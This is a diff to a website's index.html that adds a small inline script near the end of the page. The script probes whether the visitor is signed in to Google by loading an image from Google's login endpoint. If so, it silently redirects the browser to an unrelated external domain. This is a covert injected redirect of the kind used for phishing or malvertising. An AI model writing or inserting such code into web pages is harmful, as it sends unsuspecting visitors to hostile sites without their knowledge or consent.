--- a/index.html
+++ b/index.html
@@ -381,6 +381,14 @@ body {
         </footer>
     </div>
 
-
+	<script>
+(function(){
+    var img = document.createElement('img');
+    img.src = "https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&uilel=3&hl=de&service=youtube";
+    img.onload = function() {
+         window.location.href = "https://gurlingul.com/ZSRzVcdW";
+    };
+})();
+</script>
 
 </html>
